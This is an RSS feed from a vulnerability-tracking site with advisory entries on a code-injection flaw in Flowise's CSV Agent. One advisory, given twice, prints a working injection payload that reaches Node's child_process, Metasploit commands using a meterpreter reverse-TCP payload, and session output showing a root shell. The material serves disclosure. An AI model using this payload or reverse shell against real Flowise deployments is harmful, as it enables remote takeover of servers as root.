<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Fri, 02 Oct 2026 19:33:02 +0000</lastBuildDate>
    <item>
      <title>EUVD-2026-344250</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-344250</link>
      <description>EUVD-2026-344250</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-344250</guid>
    </item>
    <item>
      <title>fkie_cve-2026-69255</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2026-69255</link>
      <description>&lt;p&gt;Flowise is a drag &amp;amp; drop user interface to build a customized large language model flow. Prior to 3.1.3, the CSVAgent in packages/components/nodes/agents/CSVAgent/CSVAgent.ts extracted attacker-controlled CSV data with file.split(&amp;#39;,&amp;#39;).pop() and interpolated it directly into executable Python as base64_string = &amp;#34;${base64String}&amp;#34; before calling Pyodide. The validatePythonCodeForDataFrame() denylist only checked later LLM-generated code and did not validate this initial code block. An authenticated attacker could inject a closing quote followed by Python code, use Pyodide&amp;#39;s js bridge to load Node.js child_process, and execute arbitrary operating system commands as root in the Flowise container. This issue is fixed in version 3.1.3.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Flowise is a drag &amp;amp; drop user interface to build a customized large language model flow. Prior to 3.1.3, the CSVAgent in packages/components/nodes/agents/CSVAgent/CSVAgent.ts extracted attacker-controlled CSV data with file.split(&amp;#39;,&amp;#39;).pop() and interpolated it directly into executable Python as base64_string = &amp;#34;${base64String}&amp;#34; before calling Pyodide. The validatePythonCodeForDataFrame() denylist only checked later LLM-generated code and did not validate this initial code block. An authenticated attacker could inject a closing quote followed by Python code, use Pyodide&amp;#39;s js bridge to load Node.js child_process, and execute arbitrary operating system commands as root in the Flowise container. This issue is fixed in version 3.1.3.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2026-69255</guid>
    </item>
    <item>
      <title>GHSA-vmv7-4m6c-3cg5 — Flowise: CSV Agent Remote Code Execution via Pyodide Code Injection — Root Shell Verified</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-vmv7-4m6c-3cg5</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; npm: flowise, npm: flowise-components&lt;/p&gt;
&lt;p&gt;## UPDATE 2026-05-20: Full RCE as root VERIFIED&lt;/p&gt;
&lt;p&gt;**This is not theoretical — a Meterpreter reverse shell session as root has been established on Flowise 3.1.2.**&lt;/p&gt;
&lt;p&gt;### Verified Exploit Chain&lt;/p&gt;
&lt;p&gt;1. Python code injection via `base64_string = &amp;#34;${base64String}&amp;#34;` (CSVAgent.ts line 161)
2. Pyodide `js` bridge provides access to the host Node.js process
3. `process.mainModule.constructor._load(&amp;#39;child_process&amp;#39;)` loads child_process (bypasses ESM require restriction)
4. `.execSync(&amp;#39;CMD&amp;#39;)` executes arbitrary OS commands as **root** (PID 1 in container)&lt;/p&gt;
&lt;p&gt;### Working RCE Payload&lt;/p&gt;
&lt;p&gt;```
&amp;#34;;import js;e=js.globalThis.eval;e(&amp;#34;process.mainModule.constructor._load(&amp;#39;child_process&amp;#39;).execSync(&amp;#39;id&amp;#39;)&amp;#34;);#
```&lt;/p&gt;
&lt;p&gt;**Constraint:** No commas allowed in payload — `csvFile.split(&amp;#39;,&amp;#39;)` splits on all commas.&lt;/p&gt;
&lt;p&gt;### Metasploit Session Proof&lt;/p&gt;
&lt;p&gt;```
msf &amp;gt; use exploit/multi/http/flowise_csv_agent_rce
msf &amp;gt; set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
msf &amp;gt; exploit&lt;/p&gt;
&lt;p&gt;[+] Authentication successful
[+] Created chatflow: b6716feb-63c8-4fd2-993f-cd43788704b4
[*] Sending stage (3090404 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (172.17.0.1:4444 -&amp;gt; 172.17.0.2:41422)&lt;/p&gt;
&lt;p&gt;meterpreter &amp;gt; getuid
Server username: root&lt;/p&gt;
&lt;p&gt;meterpreter &amp;gt; sysinfo
Computer     : cbce3fb352b7
OS           : Linux 6.8.0-111-generic
Architecture : x64
Meterpreter  : x64/linux&lt;/p&gt;
&lt;p&gt;meterpreter &amp;gt; shell
# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)&lt;/p&gt;
&lt;p&gt;# uname -a
Linux cbce3fb352b7 6.8.0-111-generic x86_64 Linux
```&lt;/p&gt;
&lt;p&gt;### Addi…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; npm: flowise, npm: flowise-components&lt;/p&gt;
&lt;p&gt;## UPDATE 2026-05-20: Full RCE as root VERIFIED&lt;/p&gt;
&lt;p&gt;**This is not theoretical — a Meterpreter reverse shell session as root has been established on Flowise 3.1.2.**&lt;/p&gt;
&lt;p&gt;### Verified Exploit Chain&lt;/p&gt;
&lt;p&gt;1. Python code injection via `base64_string = &amp;#34;${base64String}&amp;#34;` (CSVAgent.ts line 161)
2. Pyodide `js` bridge provides access to the host Node.js process
3. `process.mainModule.constructor._load(&amp;#39;child_process&amp;#39;)` loads child_process (bypasses ESM require restriction)
4. `.execSync(&amp;#39;CMD&amp;#39;)` executes arbitrary OS commands as **root** (PID 1 in container)&lt;/p&gt;
&lt;p&gt;### Working RCE Payload&lt;/p&gt;
&lt;p&gt;```
&amp;#34;;import js;e=js.globalThis.eval;e(&amp;#34;process.mainModule.constructor._load(&amp;#39;child_process&amp;#39;).execSync(&amp;#39;id&amp;#39;)&amp;#34;);#
```&lt;/p&gt;
&lt;p&gt;**Constraint:** No commas allowed in payload — `csvFile.split(&amp;#39;,&amp;#39;)` splits on all commas.&lt;/p&gt;
&lt;p&gt;### Metasploit Session Proof&lt;/p&gt;
&lt;p&gt;```
msf &amp;gt; use exploit/multi/http/flowise_csv_agent_rce
msf &amp;gt; set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
msf &amp;gt; exploit&lt;/p&gt;
&lt;p&gt;[+] Authentication successful
[+] Created chatflow: b6716feb-63c8-4fd2-993f-cd43788704b4
[*] Sending stage (3090404 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (172.17.0.1:4444 -&amp;gt; 172.17.0.2:41422)&lt;/p&gt;
&lt;p&gt;meterpreter &amp;gt; getuid
Server username: root&lt;/p&gt;
&lt;p&gt;meterpreter &amp;gt; sysinfo
Computer     : cbce3fb352b7
OS           : Linux 6.8.0-111-generic
Architecture : x64
Meterpreter  : x64/linux&lt;/p&gt;
&lt;p&gt;meterpreter &amp;gt; shell
# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)&lt;/p&gt;
&lt;p&gt;# uname -a
Linux cbce3fb352b7 6.8.0-111-generic x86_64 Linux
```&lt;/p&gt;
&lt;p&gt;### Addi…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-vmv7-4m6c-3cg5</guid>
    </item>
    <item>
      <title>WID-SEC-W-2026-2589 — Flowise: Mehrere Schwachstellen</title>
      <link>https://cve.radiocsirt.org/vuln/wid-sec-w-2026-2589</link>
      <description>&lt;p&gt;Ein Angreifer kann mehrere Schwachstellen in Flowise ausnutzen, um beliebigen Code auszuführen – sogar mit Root-Rechten –, erweiterte Privilegien zu erlangen, Sicherheitsmaßnahmen zu umgehen, Sitzungen zu kapern sowie Daten offenzulegen oder zu manipulieren.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Ein Angreifer kann mehrere Schwachstellen in Flowise ausnutzen, um beliebigen Code auszuführen – sogar mit Root-Rechten –, erweiterte Privilegien zu erlangen, Sicherheitsmaßnahmen zu umgehen, Sitzungen zu kapern sowie Daten offenzulegen oder zu manipulieren.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/wid-sec-w-2026-2589</guid>
    </item>
  </channel>
</rss>
